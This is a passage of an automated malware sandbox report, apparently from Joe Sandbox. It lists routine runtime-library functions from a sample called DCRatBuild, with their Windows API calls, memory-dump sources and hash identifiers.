                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                        • String ID: pL
                                                                                                                        • API String ID: 2991157371-1374626527
                                                                                                                        • Opcode ID: 0069e2de2aea130b9e07687e18c3d781ad9644e8e078d5c100071c7cb1eb63b7
                                                                                                                        • Instruction ID: 005c2018427a15d3c1ea3c883fc206513f2c0ae975ab41c5b51d66e70691a24e
                                                                                                                        • Opcode Fuzzy Hash: 0069e2de2aea130b9e07687e18c3d781ad9644e8e078d5c100071c7cb1eb63b7
                                                                                                                        • Instruction Fuzzy Hash: 3D31D531D04109AFDB10DFA9C441BDEB7E5EF54324F21409FE5049B2A1EBBA5D41DBA8
                                                                                                                        Function 004AE528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: (J$PDu<J
                                                                                                                        • API String ID: 1269201914-3276689922
                                                                                                                        • Opcode ID: 2c74f241c802f2710a1d4655879051bcc1f52a069def1e4c5aaacec5ce08dadd
                                                                                                                        • Instruction ID: 1a5d1e17c1f4a0b83b8285f124b488c7e61ac094093aa05e74ac428686b3de1c
                                                                                                                        • Opcode Fuzzy Hash: 2c74f241c802f2710a1d4655879051bcc1f52a069def1e4c5aaacec5ce08dadd
                                                                                                                        • Instruction Fuzzy Hash: 2CB012C5B590407C3144714B2E02E3B050CC1D7F1D330C02FF528C1084EC4D0C02043E
                                                                                                                        Function 004AE532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 2J$PDu<J
                                                                                                                        • API String ID: 1269201914-3862107174
                                                                                                                        • Opcode ID: 98b52c870afe322abd42b3e42096e2d2bdb058c7acd54bebc24b78b99ba340d8
                                                                                                                        • Instruction ID: bf888223c50faedb38dc3a61e2e0844da27ff30afcc11fe6e05dd8bce0ca49da
                                                                                                                        • Opcode Fuzzy Hash: 98b52c870afe322abd42b3e42096e2d2bdb058c7acd54bebc24b78b99ba340d8
                                                                                                                        • Instruction Fuzzy Hash: 1EB09285A590007D2144614A2902E3A0108C196B19330802FF428C1084A84C0C01043E
                                                                                                                        Function 00499F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0049D343,00000001,?,?,?,00000000,004A551D,?,?,?), ref: 00499F9E
                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,004A551D,?,?,?,?,?,004A4FC7,?), ref: 00499FE5
                                                                                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0049D343,00000001,?,?), ref: 0049A011
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4209713984-0
                                                                                                                        • Opcode ID: 164ee93f1c72ee4f11989e6abbfa79af2e2011f51b6891a8b1c072619d487278
                                                                                                                        • Instruction ID: 3c73ab59f8f6885aa4da923d9976fa8f16aa5e1838818900e3274d4fc829ccab
                                                                                                                        • Opcode Fuzzy Hash: 164ee93f1c72ee4f11989e6abbfa79af2e2011f51b6891a8b1c072619d487278
                                                                                                                        • Instruction Fuzzy Hash: 1431DF31204305AFDF14CF24D808B6BBBA5EB85715F04452EF98597290C779AD48CBAA
                                                                                                                        Function 0049A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049C27E: _wcslen.LIBCMT ref: 0049C284
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A2D9
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A30C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A329
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2260680371-0
                                                                                                                        • Opcode ID: e222f8c9fd9bdc8efadc2eb653d98122d538b4348404417dc39e9e0c715a2e21
                                                                                                                        • Instruction ID: 7fccb8d6cddeb8a14aaa0b87e4b444ce65ec6c6a0542c67e32da811409e9051d
                                                                                                                        • Opcode Fuzzy Hash: e222f8c9fd9bdc8efadc2eb653d98122d538b4348404417dc39e9e0c715a2e21
                                                                                                                        • Instruction Fuzzy Hash: 820192255002106AEF31AB764C49BEE3B889F0A789F14447AFD01E6285D75CDA91C6FE
                                                                                                                        Function 004BB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004BB8B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                        • Opcode ID: 44ea6a0a98fb1bfa087ca551699269126b1047fd4b7336058cc803473aeb8f22
                                                                                                                        • Instruction ID: 5b6c3e691bf239673008b991ab808d470d06bd78d60143db9d2384651f98e850
                                                                                                                        • Opcode Fuzzy Hash: 44ea6a0a98fb1bfa087ca551699269126b1047fd4b7336058cc803473aeb8f22
                                                                                                                        • Instruction Fuzzy Hash: 63412AB050424C9EDB218E25CC84BF6BBB9DB15304F1404EED5DA86242D379AA45DFB5
                                                                                                                        Function 004BAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 004BAFDD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String
                                                                                                                        • String ID: LCMapStringEx
                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                        • Opcode ID: 4f4b8b20e85bafc3f928aa33b2f856bd50cc7b64c539f9139831f81b73a05117
                                                                                                                        • Instruction ID: 3fb5688165f4183036364ae8cc683a7321398414eaf71af90580bc8c85b1630e
                                                                                                                        • Opcode Fuzzy Hash: 4f4b8b20e85bafc3f928aa33b2f856bd50cc7b64c539f9139831f81b73a05117
                                                                                                                        • Instruction Fuzzy Hash: 87010C76505109BBCF029F91DC05EEE7F62EF09754F01415AFE1465160C63A8A31EF99
                                                                                                                        Function 004BAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,004BA56F), ref: 004BAF55
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                                        • Opcode ID: 4c816ac16a7b1bc89ce20806bc83fd6301df967f05ce27c6629251436ead4074
                                                                                                                        • Instruction ID: 126d486fbb0c382eca607db0c54d6c5c4d42824b6ae4df2fd1cb35485da61046
                                                                                                                        • Opcode Fuzzy Hash: 4c816ac16a7b1bc89ce20806bc83fd6301df967f05ce27c6629251436ead4074
                                                                                                                        • Instruction Fuzzy Hash: 57F0B475645208BFCF029F56CC02EEE7F61EF14B21B00407AFC0856260DA355A219B9E
                                                                                                                        Function 004BADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc
                                                                                                                        • String ID: FlsAlloc
                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                        • Opcode ID: 8ce181107ad71a71292ff12394be7e4c7c92b1cebc37e8ee43bd831a6b5f2dc7
                                                                                                                        • Instruction ID: 07b7f67adbb9d426d09c39344570e2822d498ecb3c4d9b934986f8552739b369
                                                                                                                        • Opcode Fuzzy Hash: 8ce181107ad71a71292ff12394be7e4c7c92b1cebc37e8ee43bd831a6b5f2dc7
                                                                                                                        • Instruction Fuzzy Hash: 64E055706812087BD601AF66CC02FAEBB65CB14B21B0000AFF80093240CE385E108AEE
                                                                                                                        Function 004AE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: ec57b7563b1b155117b1308daa783101a5da3f031c408ae07dd6e63af0cd6ead
                                                                                                                        • Instruction ID: a0ad718b59f87a29033e8aa58ed64ea0d320700b2306aaa23693ab586bddc99d
                                                                                                                        • Opcode Fuzzy Hash: ec57b7563b1b155117b1308daa783101a5da3f031c408ae07dd6e63af0cd6ead
                                                                                                                        • Instruction Fuzzy Hash: D9B012E9258110FC310421471DC2D37110CC1D7B11330C43FFC25C0480D84CEC01043E
                                                                                                                        Function 004AE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 5711af5aa27f54be694b53e890efafd97ae88d68869f0392ab93815aeaa8bde1
                                                                                                                        • Instruction ID: fdd5811f127d9e33123f43e34c0dcf9f4e2807668ac0e26737da97e2985640b6
                                                                                                                        • Opcode Fuzzy Hash: 5711af5aa27f54be694b53e890efafd97ae88d68869f0392ab93815aeaa8bde1
                                                                                                                        • Instruction Fuzzy Hash: 50B012E925C114FC3144614B1DC2E37010CC1D6B11330803FF829C1080D84CAC01053E
                                                                                                                        Function 004AE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 977890e3fdc994f04c7ae24077413d0885e39d28542c527ac3b406af0c80caa1
                                                                                                                        • Instruction ID: 936b5627cad154f46c6cfc27f673fbf4467b40ef0dccf211505536be6a02ffb5
                                                                                                                        • Opcode Fuzzy Hash: 977890e3fdc994f04c7ae24077413d0885e39d28542c527ac3b406af0c80caa1
                                                                                                                        • Instruction Fuzzy Hash: DDB012E6258010FC318466071D82E37110CC1D7B11330C03FFC29C1180D94CEC05043E
                                                                                                                        Function 004AE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 85091dc8cc042b3981759e45b0c93770a41f7a4137187303f1397ae09fef9396
                                                                                                                        • Instruction ID: 18bdc990570db7f073506197df1990e5cb8175fe937e1c61b15056c0c9af8649
                                                                                                                        • Opcode Fuzzy Hash: 85091dc8cc042b3981759e45b0c93770a41f7a4137187303f1397ae09fef9396
                                                                                                                        • Instruction Fuzzy Hash: 5AB012E5259050FC314461071D82E37110DC1D7B11330C03FFC29C1080D84CEC01043E
                                                                                                                        Function 004AE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 126dfdc96931c57c5f7ee52f0fe837b6458efa3ccf75b7b1f1fbb7dbe06def6d
                                                                                                                        • Instruction ID: e148c398014a1fbfa2f54574c0c22839dc9c2877706639c7e583326ab94a2f19
                                                                                                                        • Opcode Fuzzy Hash: 126dfdc96931c57c5f7ee52f0fe837b6458efa3ccf75b7b1f1fbb7dbe06def6d
                                                                                                                        • Instruction Fuzzy Hash: 82B012F5259150FC318462071D82E37010DC1D6B11330813FF829C1080D84CAC45043E
                                                                                                                        Function 004AE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
